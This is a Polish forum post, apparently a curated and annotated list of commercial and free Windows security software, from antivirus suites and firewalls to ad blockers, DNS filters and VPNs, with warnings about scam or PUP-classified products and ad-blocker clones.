Przeterminowane / wycofane z obiegu aplikacje, podejrzane produkcje oraz inne dziwactwa W spoilerach wycofane oferty, stare nierozwijane / porzucone programy, dziwadła oraz zdecydowanie niepolecane produkty, niezależnie od faktu, że są to teoretycznie "zarejestrowane" marki, a niektóre nawet figurujące jako "partnerzy Microsoftu". Wyliczane tu po to, by ich właśnie nie instalować, bo na rozmaitych portalach oprogramowania / listach softu można się na te kwiatki nadziać. Notuję też, że niektórzy użytkownicy próbujący usuwać infekcje adware na własną rękę instalują archaiczne bezużyteczne wersje typu "antyspyware". Używanie starych nieaktualizowanych wersji to fałszywe zabezpieczenia, limitacje zabezpieczeń (brak dostępnych najnowszych metod gwarantujących bezpieczeństwo), słaba odporność na nowoczesne formy malware, również jedna z dróg infekcji (wykorzystanie określonej luki w danym oprogramowaniu), błędy i niedoróbki, brak supportu. Ponadto, próba instalacji starych aplikacji (zwłaszcza tych opartych o sterowniki trybu kernel) na nowoczesnych systemach (np. Windows 10 i Windows 11) może mieć nieprzewidziane skutki, prowadząc do niestabilności i awarii. Darmowe: Komercyjne: Uwaga na poniższe aplikacje! ByteFence Antimalware Free - Podejrzany rebrand Reason Core Security, instalowany / przemycany na komputery technikami PUP. Usuwany przez AdwCleaner/MBAM. Od 1 stycznia 2023 i tak już niedostępny. RemoveIT Pro SE - Sklasyfikowany jako fake, wykrywany przez MBAM jako PUP.Optional.RemoveITPro. TotalAV / PCProtect - Klony. Ofensywne techniki marketingowe, scam. Wykrywane przez AdwCleaner/MBAM jako PUP.Optional.TotalAV / PUP.Optional.PCProtect. YAC (Yet Another Cleaner) - Aplikacja m.in. reklamowana na stronach hijackerów skrótów, scam, kradzież bazy MBAM. Wykrywany przez MBAM pod nazwą kodową FraudTool.YAC. Usuwany także przez AdwCleaner. Uwaga na klony uBlock Origin i inne podejrzane adblocki! Proszę nie pomylić uBlock Origin (właściwa wersja) z uBlock (fork nastawiony na zdzieranie dotacji, po przejęciu przez AdBlock przebrandowany jako uBlock, LLC i z wbudowanym omijaniem reklam). Nano Adblocker to kolejny fork uBlock Origin który należy omijać: wersja dla Chrome po sprzedaży nieznanym podmiotom przeobraziła się w malware, zaś wersja dla Firefox nie jest już rozwijana i autor poleca przesiadkę na oryginał. Ogólnie, w bazach dodatków Firefox i Chrome mnożą się podejrzane adblocki robione przez firmy ... parające się reklamodawstwem i instalacjami PUP. Przykłady "blokerów reklam" od takich firm: Adblocker Ultimate, Ad-Blocker (oba opisy na SystemLookup zrobione przeze mnie). Te dodatki mają też podejrzanie wysoką liczbę użytkowników.

Komercyjne oprogramowanie: Firewalle z własnymi sterownikami ZoneAlarm Pro Firewall Rozwiązania oparte na Windows Filtering Platform (WFP) bez dodatkowych sterowników / Nakładki na Zaporę systemu GlassWire Premium Windows 10 Firewall Control Basic | Plus | Network/Cloud [Rozwiązanie niezależne od Zapory systemu, może zostać wyłączona] Pakiety zabezpieczeń Adaware Antivirus Pro | Total Arcabit Home Security | Internet Security - mks_vir Internet Security [Obie linie są pod parasolem tego samego właściciela] [Silnik Bitdefender] Avast Premium | Ultimate - Avast One [Avast przejęty przez NortonLifeLock, dla USA dodatkowy plan Platinum z integracją LifeLock] AVG Internet Security | Ultimate [Avast przejął AVG, oba produkty mają scalone mechanizmy] Avira Internet Security | Prime [Avira przejęta przez NortonLifeLock] Bitdefender Ultimate | Premium | Total Security | Internet Security | Family Pack [Na polskiej stronie nie ma oferty dwóch pierwszych pozycji] Comodo Internet Security Pro [To nowsza wersja niż proponowana za darmo. Porównaj z sekcją Darmowych.] Dr.Web Security Space ESET Internet Security | Smart Security Premium [Pełne instalatory: Offline] F-Secure Internet Security | Total [Silnik Avira, wcześniej Bitdefender] G Data Internet Security | Total Security [Silnik Bitdefender] Heimdal Next-Gen Antivirus | Premium Security Home [Silnik Avira] K7 Anti-Virus Premium | Total Security | Ultimate Security Kaspersky Standard | Plus | Premium [Na polskiej stronie nadal stare pakiety Anti-Virus, Internet Security i Total Security] McAfee+ Premium | Advanced | Ultimate - Total Protection (plan Essential) [Na polskiej stronie nadal w ofercie tylko Total] Norton 360 (AntiVirus Plus | Standard | Deluxe | Select + LifeLock) [Na polskiej stronie nadal stare Premium] Panda Dome (Essential | Advanced | Complete | Premium) [Panda przejęta przez WatchGuard, przyszłość produktów domowych niepewna] Quick Heal Internet Security | Total Security | Total Security Multi-Device ReasonLabs RAV Premium | Elite | Family Pack ReasonLabs RAV Essentials [Niejasna licencja. Deklarują jako darmowy w FAQ, ale nigdzie nie widać tej opcji wyboru / pobierania i wszystkie linki wiodą do w/w planów płatnych] Trend Micro Internet Security | Maximum Security | Premium Security Suite [Na polskiej strony brak ostatniej oferty] [Pełne instalatory: Offline | Offline] VIPRE Advanced Security | Ultimate Security Bundle [Silnik Bitdefender] Webroot AntiVirus | Internet Security Plus | Internet Security Complete | Premium ZoneAlarm Pro Antivirus + Firewall | Extreme Security NextGen ----> Informacyjnie lista ze spisem producentów: List of AV Vendors (PC) Obecnie Avast/AVG + Avira + Norton = NortonLifeLock. Nieprzewidywalne co się stanie z produktami. Póki co, w Avast One rozpoczęto integracje LifeLock. W Norton zachowania balansujące na pograniczu "niechcianej aplikacji". W latach 2021-2022 dostępna funkcja która w mojej opinii nigdy nie powinna być w programie zabezpieczającym, tzn. ... koparka walut (Norton Crypto) motywowana "bezpiecznym wyborem" zamiast posługiwania się podejrzanymi aplikacjami. W określonych przypadkach pozornie najbardziej rozbudowane edycje to chwyt marketingowy. Tzn. ledwie kilka funkcji więcej lub funkcje niekluczowe z punktu widzenia bezpieczeństwa, np. jakieś głupoty typu "optymalizacje systemu". Antywirusy Avira Antivirus Pro Bitdefender Antivirus Plus Emsisoft Anti-Malware Home [silnik Bitdefender] eScan Anti-Virus [silnik Bitdefender] ESET NOD32 Antivirus [Pełne instalatory: Offline] G Data Antivirus [silnik Bitdefender] Glarysoft Malware Hunter Pro [silnik Avira] IKARUS anti.virus NANO Antivirus Pro Quick Heal AntiVirus Pro Sophos Home Spybot Home | Professional [silnik Bitdefender] Surfshark Antivirus [silnik Avira] TrendMicro Antivirus+ Security [Pełne instalatory: Offline | Offline] VIPRE Antivirus Plus [silnik Bitdefender] ----> Informacyjnie lista ze spisem producentów: List of AV Vendors (PC) Antymalware (z osłoną) CatchPulse (ex SecureAPlus) [Dane na polskiej stronie niezaktualizowane] [Multisilnikowy moduł Cloud AV + Offline AV (Avira), może pracować równolegle z innym antymalware po wyłączeniu integracji - FAQ] Cylance Smart Antivirus (ex Cylance PROTECT Home Edition) [Uzupełnia inne antywirusy] Dr.Web Katana [Uzupełnia inne antywirusy, z wyjątkiem w/w Dr.Web Security Space który już posiada tę integrację] Emsisoft Anti-Malware Home [Wbudowany silnik antywirusowy. Zastępuje innego antywirusa - FAQ] Heimdal Threat Prevention Home (ex Thor Home) [Może pracować równolegle z innym antywirusem - FAQ] Malwarebytes Anti-Malware (MBAM) Premium [Może pracować równolegle z innym antywirusem - FAQ wersji 4.x, FAQ wersji 3.x] RogueKiller Anti Malware Premium | Technician SUPERAntiSpyware Professional [Nie zastępuje antywirusa] Xvirus Anti-Malware Pro (ex Xvirus Personal Guard) [Nie zastępuje antywirusa] Zemana AntiMalware Premium [Nie zastępuje antywirusa] [Wygląda na nierozwijany/porzucony] Antymalware (bez osłony) HitmanPro UnHackMe Anti-Exploit, Anti-Ransomware / Zabezpieczenia przed infekcjami szyfrującymi dane BlackFog Privacy CryptoPrevent Anti-Malware HitmanPro.Alert NoVirusThanks OSArmor ZoneAlarm Anti-Ransomware ----> Malwarebytes Anti-Exploit i Malwarebytes Anti-Ransomware zostały scalone w Malwarebytes Anti-Malware Premium 3.0 (patrz wyżej) ----> Funkcjonalność typu "Anti-Ransomware" jest wbudowana w niektóre komercyjne pakiety / antywirusy, np. Bitdefender (patrz wyżej) Zabezpieczenia przed keyloggerami i przechwytywaniem ekranu KeyScrambler Professional | Premium SpyShelter Silent | Premium | Screen Phantom Zemana AntiLogger Premium [Wygląda na nierozwijany/porzucony] Inne monitory / Anti-exe, śledzenie zachowań, HIPS AppGuard Solo (ex AppGuard Business) [Zastępuje dawną wersję Personal: info] Faronics Anti-Executable Standard NoVirusThanks LNK File Guard NoVirusThanks Registry Guard [Obecnie program płatny] ReHIPS VoodooShield Cyberlock Utwardzanie ustawień Windows NoVirusThanks SysHardener [Obecnie program płatny] Preparowane przeglądarki Multilogin + Mimic browser | Stealthfox browser Piaskownice Cybergenic Shade Sandbox Home Edition [obecnie to trial: FAQ] Wirtualizacja całego systemu lub dysku / Przywracanie poprzedniego stanu BitDisk10 Clean Slate Faronics Deep Freeze Standard HDGUARD [Linki pobierania + PDF] Reboot Restore Rx Pro (ex Drive Vaccine) RollBack Rx Professional | Server Shadow Defender Filtrowanie DNS DNSpecter ----> Popatrz do analogicznej sekcji na liście darmowych do ustępu "Wymóg rejestracji konta / Wersje instalacyjne". Dostawcy oferują też warianty płatne. Blokery reklam (brak zależności od typu przeglądarki) AdFender AdGuard for Windows Blokery trackerów Avast AntiTrack Premium | AVG AntiTrack | Norton AntiTrack [Wszystkie produkty pod kontrolą NortonLifeLock] Ghostery Insights [beta] [narzędzie analityczne i raczej pomocne dla... reklamodawców] VPN (maskowanie adresu IP) AdGuard VPN Avast SecureLine VPN | AVG Secure VPN | HMA VPN [Wszystkie produkty pod kontrolą Avast -> teraz NortonLifeLock] Avira Phantom VPN Pro | Norton Secure VPN [Produkty nadal niezależne, ale pod tym samym płaszczem NortonLifeLock] Bitdefender Premium VPN F-Secure VPN (ex Freedome) G DATA VPN IVPN Kaspersky VPN Secure Connection Unlimited [Na polskiej stronie figuruje jako stary Premium] [Partnerem jest Aura = nowa postać Pango i Hotspot Shield ] Mullvad VPN [Partnerzy i dystrybutorzy: Malwarebytes , Mozilla] ProtonVPN Surfshark | NordVPN [Pod jedną spółką choć działają niezależnie. Z sieci NordVPN korzysta Opera VPN Pro.] TunnelBear [Marka TunnelBear pod kontrolą McAfee. Przyszłość niepewna skoro rozwój zastopowany + zlikwidowano bliźniaczy RememberBear.] CyberGhost VPN, ExpressVPN, Private Internet Access i Zenmate VPN są obecnie własnością tej samej firmy Kape Technologies, dawniej znanej jako Crossrider i powiązanej z instalacjami adware. Szczegółowe tabelki z porównaniem serwisów VPN tutaj i tutaj. Rekomendacje serwisu związanego z prywatnością, po kontrowersjach są dwie strony: Privacy Guides (właściwa) vs. PrivacyTools. Ochrona tożsamości Adaware Privacy Avast BreachGuard | AVG BreachGuard [Avast przejęty przez NortonLifeLock] Avast Secure Identity (USA) | LifeLock Identity Theft Protection (USA) | Norton Identity Advisor Plus (UK i wybrane kraje EU) [Nie wygląda, by teren Polski był obsługiwany] Bitdefender Digital Identity Protection (oferta w sekcji "Usługi dodatkowe") | Bitdefender Identity Theft Protection (USA) F‑Secure ID PROTECTION VIPRE Privacy Shield WOT Premium Sejfy na hasła / Menedżery haseł 1Password Bitdefender Password Manager Keeper Password Depot ----> Popatrz do analogicznej sekcji na liście darmowych do ustępu "Oparte na chmurze / Wymóg rejestracji konta". Większość z tych aplikacji ma wersję "Premium". Rekomendacje serwisu związanego z prywatnością, po kontrowersjach są dwie strony: Privacy Guides (właściwa) vs. PrivacyTools. Sprawdzanie luk / Aktualizacje oprogramowania Ninite Pro UCheck Premium | Technician Webroot System Analyzer Tweakery prywatności Spybot Anti-Beacon Plus Zabezpieczenia pod kątem infekcji z mediów przenośnych USB DriveSecurity powered by ESET

Darmowe oprogramowanie: Unified Threat Management (UTM) / "Wielofunkcyjne zapory sieciowe" - Odrębny system operacyjny wymagający dedykowanego komputera Arista NG Firewall Free [Wcześniej jako Untangle NG Firewall. Domyślnie instalowany 30-dniowy trial który przełącza się na okrojoną wersję darmową.] pfSense Sophos Firewall Home Edition [Zastępuje oferowane wcześniej dwie odrębne edycje "Sophos UTM Home Edition" + "Sophos XG Firewall Home Edition"] Zapory sieciowe / Firewalle - Do instalacji w działającym Windows Firewalle z własnymi sterownikami Comodo Firewall Free [Link do darmowej wersji 2020 v12.2.2.8012. Pobieranie ze strony domowej podstawia nowszą wersję Pro.] Fort Firewall Safing Portmaster [Wersja Free pozbawiona kilku niezbyt istotnych cech względem płatnych planów] ZoneAlarm Free Firewall [Alternatywny link: Tutaj] Rozwiązania oparte na Windows Filtering Platform (WFP) bez dodatkowych sterowników / Nakładki na Zaporę systemu BiniSoft Windows Firewall Control [Nakładka na Zaporę systemową] [Po przejęciu przez Malwarebytes wszystkie funkcje za darmo] Evorim Free Firewall [Domyślnie wyłącza Zaporę systemową, ale w opcjach można przestawić na równoległe działanie obu] PrivateWin10 [Jedną z funkcji jest nakładka na Zaporę systemu] simplewall (ex Wfp Tool) [Rozwiązanie niezależne od Zapory systemu, mogą działać równolegle ] TinyWall [Nierozwijany] Windows 10 Firewall Control Free [Rozwiązanie niezależne od Zapory systemu, może zostać wyłączona] Windows Firewall Notifier (WFN) [beta] Xvirus Firewall Małe (niekluczowe) dodatki dla Zapory systemu Windows: Firewall App Blocker OneClickFirewall Tweaking.com - Windows Firewall Inne pomoce: GlassWire Free [Wersja darmowa ma tylko monitor sieciowy, jest pozbawiona firewalla i funkcji zabezpieczających] Pakiety / Platformy Pakiety zabezpieczeń Adaware Protect Avast One Essential Avira Free Security Comodo Internet Security [Link do darmowej wersji 2020 v12.2.2.8012. Pobieranie ze strony domowej podstawia nowszą wersję Pro.] Huorong Internet Security [Alternatywne pobieranie w Sklepie Microsoftu] Qihoo 360 Total Security Essential | Qihoo 360 Total Security [silniki Avira + Bitdefender] ZoneAlarm Free Antivirus & Firewall [silnik Kaspersky] [Alternatywny link: Tutaj] - Obecnie Avast/AVG + Avira + Norton = NortonLifeLock. Nieprzewidywalne co się stanie z produktami. - Te "pakiety" to w większości raczej tylko składanki kilku produktów dostępnych jako osobne, bądź też integracja zbędnych funkcji. Adaware łączy w paczce kwestionowalnej jakości produkty. - Tylko pakiety Comodo i ZoneAlarm zawierają własny firewall. Avast One posiada prostą nakładkę na Zaporę Windows. 360 Total Security oferuje doinstalowanie niepełnowartościowego monitora GlassWire. - Qihoo - Z firmą są związane liczne kontrowersje oraz afera z manipulowaniem wyników w testach. Pod ocenę indywidualną czy produkt jest godny zaufania. Uwaga, w instalatorach mogą być niepożądane dodatki / oferty, które należy odznaczyć. Poglądowo artykuły: Has The Antivirus Industry Gone Mad?!, Beware: Free Antivirus Isn't Really Free Anymore. Panele obsługi wielu urządzeń Emsisoft Management Console OPSWAT MetaAccess + OPSWAT Client [Wcześniej znany jako Metadefender Endpoint Management / OPSWAT Gears. Wersja darmowa do 50 urządzeń.] ----> Interfejsy webowe kont, np.: Avast Account, My Avira Account (ex Avira Connect, Avira Online Essentials), My Kaspersky. Antywirus / Antymalware Antywirusy Adaware Antivirus Free [silnik Bitdefender] Avast Free Antivirus [Pełne instalatory: Offline] [Avast przejęty przez NortonLifeLock] AVG AntiVirus Free [Pełne instalatory: Offline] [Avast przejął AVG, oba produkty mają scalone silniki] Avira Free Antivirus [Avira przejęta przez NortonLifeLock] Bitdefender Antivirus Free Comodo Free Antivirus (CAV) [Link do darmowej wersji 2020 v12.2.2.8012. Nie jestem pewna co ładuje strona domowa, bo w przypadku innych instalacji niespodzianka.] Kaspersky Free (ex Kaspersky Security Cloud Free (KS)) [Polska strona oferuje starą wersję, tzn. plik o oznaczeniu "KFA".] [Oferty niemożliwe do wyłączenia] NANO Antivirus Free Panda Free Antivirus [Panda przejęta przez WatchGuard, przyszłość produktów domowych niepewna] Windows Defender wbudowany w Windows 10 i Windows 11 to dobre zabezpieczenie. Zaawansowani użytkownicy mogą skorzystać z tweakera ConfigureDefender. Alternatywą jest bardziej "user friendly" DefenderUI, z tą różnicą że działa cały czas w tle "chroniąc" Defendera. Antymalware (z osłoną) CatchPulse Lite (ex SecureAPlus Lite) [Dane na polskiej stronie niezaktualizowane] Crystal Security [Prawdopodobnie porzucony] Immunet Protect [Chmura + silnik ClamAV] Wise Anti Malware [silnik Avira] Xvirus Anti-Malware (ex Xvirus Personal Guard) Antymalware (wersje darmowe pozbawione osłony) Emsisoft Anti-Malware Home [silnik Bitdefender] [Przez 30-dni można testować ochronę, potem następuje przełączenie na wersję freeware bez rezydenta] Malwarebytes (MBAM) [Przez 14-dni można testować ochronę, potem następuje przełączenie na wersję freeware bez rezydenta] NoBot RogueKiller Anti Malware Free Spybot Free Edition SUPERAntiSpyware Free Edition Vir.IT eXplorer Lite X-Sec Malware Scanner ----> Inne mini skanery do usuwania infekcji bez funkcji zabezpieczających są wyliczane w temacie Zbiór narzędzi usuwających. Programy marki IOBit (IOBit Malware Fighter Free) - Liczne kontrowersje i marna reputacja producenta w środowisku usuwania malware (program niezalecany). Ponadto notoryczne adware/PUP w instalatorach wersji darmowych, co jest całkowitą sprzecznością z rolą jaką ma pełnić aplikacja. Immunizacje i monitorowanie Zabezpieczenia przed keyloggerami i przechwytywaniem ekranu CamWings Ghostpress KeyScrambler Personal Anti-Ransomware / Zabezpieczenia przed infekcjami szyfrującymi dane AppCheck Free (Personal) CryptoPrevent Free Edition [Stara edycja darmowa wycofana, nadal dostępna na serwisach zewnętrznych] Kaspersky Anti-Ransomware Tool Free Malwarebytes Anti-Ransomware (MBARW) Beta [Po wydaniu MBAM 3.0 produkt utrzymany jako darmowa permanentna beta - Info] MBRFilter [Tylko dla dysków typu MBR, zabezpieczenie przed modyfikacją MBR. Nowoczesne systemy jeżdżą na GPT.] RansomSaver for Outlook [Wtyczka do Outlook] SBGuard Anti-Ransomware [Wygląda na nierozwijany/porzucony] ----> Również aplikacje typu "Anti-Exploit" linkowane poniżej. Anti-Exploit, Process Mitigation / Zapobieganie wykorzystaniu luk w zabezpieczeniach oprogramowania EMET (Enhanced Mitigation Experience Toolkit) [Dla starszych systemów] GFlagsX | Alternatywny fork [Brak oficjalnej zgodności z Windows 10 Wersja 1709 i nowszymi, ew. można korzystać o ile nie skonfigurowano Windows Defender Exploit Guard] Malwarebytes Anti-Exploit (MBAE) Beta [Po wydaniu MBAM 3.0 scalenie wersji Free i Premium w darmową permanentną beta z funkcjami Premium] Process Mitigation Management Tool Wsparcie EMET wygasło dnia 31 lipca 2018. Microsoft usunął linki pobierania, ale program można pobrać przez Wayback Machine. EMET versus Windows 10: oficjalna zgodność kończy się na Windows 10 Wersja 1607 (do wglądu też porównanie możliwości starszych wersji Windows 10 w kombinacji z EMET). Funkcje EMET zostały scalone w Windows Defender Exploit Guard na Windows 10 Wersja 1709. Inne monitory / Anti-exe, śledzenie zachowań, HIPS AppSamvid ArcticMyst Security by DeepTide MJ Registry Watcher [32-bitowy program, nie stosować na 64-bitowych systemach] Privacy Fence by Fortres Grand Real Protect w Trellix Stinger (ex McAfee Stinger) Tiny Watcher Türsteher [reinkarnacja komercyjnego Excubits Bouncer, ale brak bezpośredniego instalatora i wymagane mozolne ręczne roboty, dla ekspertów] WhitelistCloud Standalone [Bardzo obcięty fragment funkcji zintegrowanej w płatnym VoodooShield Cyberlock] Utwardzanie ustawień Windows ConfigureDefender [wersja indywidualna, również jako moduł w Hard_Configurator] Hard_Configurator Hardentools Run-By-Smartscreen [wersja indywidualna, również jako moduł w Hard_Configurator] Simple Software-Restriction Policy Simple Windows Hardening [uproszczona wersja Hard_Configurator] Izolacje / Wirtualne środowiska Piaskownice Sandboxie Classic | Sandboxie Plus [forki od Davida, oryginalny program zlikwidowany przez Sophos] Windows Sandbox (Piaskownica systemu Windows) [funkcja opcjonalna w Windows 10 Wersja 1903 i nowszych, niedostępna w edycji Home] Wirtualizacja całego systemu lub dysku / Przywracanie poprzedniego stanu Reboot Restore Rx Free Inne DefShutdown Blokowanie reklam, skryptów, trackerów, niebezpiecznych stron Alternatywne serwery DNS / Filtrowanie DNS Wymóg rejestracji konta / Wersje instalacyjne: AdGuard DNS Starter [wariant free limituje ilość zapytań do 300.000 na miesiąc] AdGuard Home [serwer DNS dla sieci domowej] Cisco OpenDNS Home Cloudflare WARP (1.1.1.1) NextDNS Free [wariant free limituje ilość zapytań do 300.000 na miesiąc, multum opcji konfiguracyjnych, aplikacja dla Windows i routerów] YogaDNS Basic + NextDNS [Yoga domyślnie instaluje trial 31 dni który przełącza się na wersję darmową] Adresy do wpisania w konfiguracji systemu bądź przeglądarki: AdGuard Public DNS DoH, IPv6, IPv4 AhaDNS Blitz DoH Cisco OpenDNS Family Shield IPv4 Cisco OpenDNS Standard DoH, IPv6, IPv4 CleanBrowsing Free Filters DoH, IPv6, IPv4 Cloudflare 1.1.1.1 DoH, IPv6, IPv4 Comodo Secure DNS IPv4 CONTROL D Free DNS DoH, IPv6, IPv4 DNS0.eu DoH, IPv6, IPv4 Mullvad Public DNS DoH, IPv6, IPv4 Neustar UltraDNS Public IPv6, IPv4 NextDNS Free DoH, IPv6, IPv4 [można po prostu "przepisać" dane do konfigów bez rejestracji czy instalacji] Quad9 DoH, IPv6, IPv4 Yandex DNS IPv6, IPv4 ----> Poglądowa spora lista w bazie wiedzy AdGuard: Known DNS Providers. Z punktu widzenia Windows obecnie są dwa główne typy, które konfiguruje się w różnych miejscach: IPv4 i IPv6 - Klasyczne adresy wypełniane we Właściwościach połączeń sieciowych w Panelu sterowania Windows. Wyjątkiem jest tu Windows 11, który w opcjach IPv4 i IPv6 pozwala również skonfigurować to: DoH (DNS-over-HTTPS) - Bezpośrednia obsługa DoH jest w Windows 11 oraz głównych przeglądarkach. Firefox: Ustawienia > Ogólne > Sieć > DNS poprzez HTTPS. Domyślnie już zintegrowany Cloudflare i NextDNS. Chrome: Ustawienia > Prywatność i bezpieczeństwo > Bezpieczeństwo > Użyj bezpiecznego serwera DNS. Domyślnie już jest wbudowany Cloudflare, CleanBrowsing i OpenDNS. Edge: Ustawienia > Prywatność... > Zabezpieczenia > Użyj bezpiecznego serwera DNS. Te same integracje co w Chrome. Pale Moon/Basilisk: brak obsługi. Autor nie ma zamiaru tego implementować... Rekomendacje serwisu związanego z prywatnością, po kontrowersjach są dwie strony: Privacy Guides (właściwa) vs. PrivacyTools. Blokowanie statyczne w oparciu o plik Hosts i rejestr Dan Pollock's Hosts | MVPS Hosts | Steven Black's Unified hosts file [Gotowe pliki Hosts] [Alternatywa: w uBlock Origin są opcjonalne filtry z zawartością niektórych] Edge AdBlock [Zautomatyzowana instalacja Dan Pollock's Hosts] Spybot Free Edition [Edycja Hosts + Witryn z ograniczeniami] SpywareBlaster [Edycja Witryn z ograniczeniami, od wersji 6.0 blokowanie Cookies / JavaScript w uprawnieniach witryn i restrykcje w kluczach Policies dla Edge i innych Chromium] Blokowanie via plik Hosts (globalne) oraz Witryny z ograniczeniami na poziomie rejestru (tylko IE) to metodologia przestarzała. A bardzo rozbudowany plik Hosts może obniżyć wydajność systemu - konflikt z usługą buforującą "Klient DNS", którą należałoby zdeaktywować (lub pozbyć się modyfikacji pliku). Przykład z forum. Edycja Hosts może być przydatna, pod warunkiem że nie sprowadza się do tysięcy rekordów. Benefitem jest, że edycja jest globalna, tzn. ma wpływ na wszystkie przeglądarki i inne programy. Skutkiem ubocznym zaś "dziury" i inne artefakty w miejscach zablokowanych. Blokowanie reklam via rozszerzenia w przeglądarkach AdBlock [Oparty na Adblock Plus od wersji 3.0] Adblock Plus AdGuard AdGuard MV3 [Ograniczona funkcyjnie wersja związana z limitacjami Chrome. Manifest V3] Avira Browser Safety | Avira Safe Shopping [Moduł oparty na AdGuard] Ghostery Stop Reclame [Produkcja ukraińska toteż (niedostępne do manipulacji) filtry zdają się być bardziej orientowane na wschodnie tereny. Obecnie brak jakiejkolwiek konfiguracji. Manifest V3] uBlock Origin uBlock Origin Lite [Ograniczona funkcyjnie wersja związana z limitacjami Chrome. Manifest V3] Wersje "Legacy" dla Pale Moon i Basilisk : Adblock Latitude | Adblock Latitude [Oparty na Adblock Plus 2.x] uBlock Origin (Legacy) ------------------------------------------ ABPrime [Oparty na Adblock Plus 2.x] [Pierwotnie linkowany na stronie Pale Moon ale po kontrowersjach między developerami obecnie "powiązany" z klientem pocztowym Interlink] EHPrime [Dodatek do ABPrime i Adblock Latitude, obecnie "powiązany" z klientem pocztowym Interlink] ------------------------------------------ Alternatywne style dla stron: Retheme [Nie jest to klasyczny adblok tylko "czyściciel" stylu stron. Domyślnie ładowany matrix dla wszystkich stron. Bardziej precyzyjne style są tworzone dla popularnych stron ręcznie przez autora.] Blokery dla Chrome są na drodze upośledzenia w związku z wprowadzanymi przez Chrome restrykcjami (Manifest V3), co m.in. oznacza: limitację ilości filtrów, niemożność dodawania własnych filtrów, opóźnioną aktualizację filtrów (aktualizowane wraz z całym rozszerzeniem). Dlatego też wersje tego samego produktu dla Chrome i Firefox mogą się bardzo różnić na korzyść Firefox. Pełnowartościowe rozszerzenia bez oznaczenia "Manifest V3" jeszcze działają w Chrome, ale prawdopodobnie koniec to przełom 2023/2024. ------------------------------------------------ uBlock Origin to polecany ogólny multifunkcyjny bloker znacznie wykraczający poza pojęcie "ad blocker", domyślnie szerzej prekonfigurowany wliczając trackery i domeny malware, a to nie koniec możliwości. Aplikuje podstawowe polskie filtry, ale możliwe doinstalowanie dodatkowych (np. usuwających uciążliwości i banery cookies): Polskie filtry. Uwaga na podejrzane klony! Adblock Plus oraz AdBlock (od 2021 pod kontrolą tej samej firmy eyeo.com i podejrzane zachowania): Po instalacji otwiera się strona "System oparty na słowie honoru" sugerująca konieczne opłaty za użytkowanie, a to tylko żebry by się zaopatrzyć w opcjonalny Adblock Plus Premium / AdBlock Premium. Domyślnie zaznaczona opcja "Pokaż akceptowalne reklamy". Preinstalowane 2 filtry ("EasyList polski+angielski" oraz "ABP anti-circumvention") a reszta do konfiguracji w opcjach. Ghostery to produkt ze skazami na wizerunku. Dziwnym trafem wpadający w ręce firm powiązanych z reklamodawcami. Uprzednio pod kontrolą Evidon (funkcja "Ghostrank" wysyłała dane do reklamodawców), następnie Cliqz GmbH (były reklamodawcze akcenty w postaci "Ghostery awards"). W bazach dodatków można znaleźć więcej propozycji, ale odradzam dalsze poszukiwania. Proszę bardzo uważać. Jest dużo rozwiązań wątpliwej jakości, a nawet softów conajmniej podejrzanych (np. od firm parających się ... instalacją niepożądanych aplikacji!). Ogólnie rzecz biorąc brak też rozwiązań własnych, przeważnie produkcje są oparte na silniku Adblock Plus, AdGuard lub uBlock Origin i sugeruję brać po prostu oryginał. Siła tkwi też w odpowiednich filtrach. Blokowanie minerów / kopania kryptowalut na stronach minerBlock ----> Wybrany adbloker z dodatkowym filtrem. uBlock Origin ma zintegrowany domyślnie filtr własny "Resource abuse". ----> Edycja Hosts, gotowe listy: CoinBlockerLists, NoCoin Filter List. Również uBlock Origin potrafi zaimportować listę w formacie Hosts. ----> W Firefox natywnie wbudowane filtry Disconnect blokujące koparki. Blokowanie skryptów, ramek, pluginów i innych żądań Decentraleyes [Podobna eksperymentalna funkcjonalność była w starych wersjach uBlock Origin] LocalCDN NoScript [Wbudowany też w Tor Browser] Request Blocker Request Control ScriptSafe [Wersja dla Firefox w niewyjaśnionych okolicznościach usunięta z Mozilla Add-ons ale dostępny fork ] Third-party Request Blocker [Alternatywa dla RequestPolicy] uBlock Origin [Skonfigurowany w trybach Medium/Hard. Alternatywa dla NoScript, RequestPolicy i uMatrix.] uMatrix [Funkcjonalność zastępująca NoScript, PoliceMan i RequestPolicy.] [Nierozwijany] Wersje "Legacy" dla Pale Moon i Basilisk : Decentraleyes Block Content | Block Content ηMatrix | ηMatrix Blokowanie może skutkować niepoprawnym działaniem stron. uMatrix / ηMatrix to rozwiązania dla zaawansowanych, wymagają dużej interakcji z użytkownikiem, by ustawić wszystko jak należy. Na temat zasadności użytkowej Decentraleyes/LocalCDN w Wiki Arkenfox. Blokowanie trackerów Ogólne: AdNauseam [Oparty na uBlock Origin] Disconnect Free * Ghostery * Privacy Badger * [Obecnie lokalny tryb uczenia się domyślnie wyłączony. Funkcje zbieżne z innymi blokerami i opcjami Firefox.] Privacy Possum * [Wersja dla Chrome już niedostępna...] uBlock Origin [Funkcjonalność zastępująca Disconnect, Ghostery i Privacy Badger z wyłączonym trybem uczenia się.] * Zbędne na Firefox z natywną Wzmocnioną ochroną przed śledzeniem (Enhanced Tracking Protection), z podzespołem "Całkowita ochrona ciasteczek" (Total Cookie Protection). Ochrona ta integruje filtry Disconnect. Szczegóły w Wiki Arkenfox. Specjalizowane w anti-fingerprinting: CanvasBlocker CanvasBlocker Legacy | CanvasBlocker Legacy Canvas Fingerprint Defender Chameleon JShelter Trace | Trace W Firefox większość tych rozszerzeń zastępuje natywna ochrona Fingerprinting Protection (domyślnie jednak wyłączona). Wg Wiki Arkenfox jest to najlepsze rozwiązanie, ale jeśli funkcja nie zostanie aktywowana to polecany jest CanvasBlocker. Spodziewane skutki uboczne w funkcjonowaniu stron, np. obrazki załączane tutaj na forum mogą wyglądać w taki sposób. Usuwanie śledzących przekierowań z adresów: ClearUrls Don't track me Google Pure URL [Rozszerzenie nie adresuje linków Google jak w/w, ale możliwe obejście poprzez zastosowanie Greasemonkey + userscript.] ----> Wybrany adbloker z dodatkowym filtrem. Np. w uBlock Origin do włączenia filtr "AdGuard URL Tracking Protection" (wtedy ClearUrls zbędny). Inne: Facebook Container Firefox Multi-Account Containers Firefox Relay Trocker Dodatki informacyjne: Kimetrak | Kimetrak Lightbeam uBO-Scope Blokowanie niebezpiecznych stron, phishingu, serwerów C&C malware i innych Adaware Web Companion | Adaware Protect Avira Browser Safety | Avira Safe Shopping Bitdefender TrafficLight Browser JSGuard Comodo Online Security [Prawdopodobnie porzucony. Wersja dla Firefox usunięta z bazy dodatków.] CSS Exfil Protection Emsisoft Browser Security Malwarebytes Browser Guard McAfee WebAdvisor Microsoft Defender Browser Protection Netcraft Browser Extension OPSWAT File Security for Chrome WOT Free 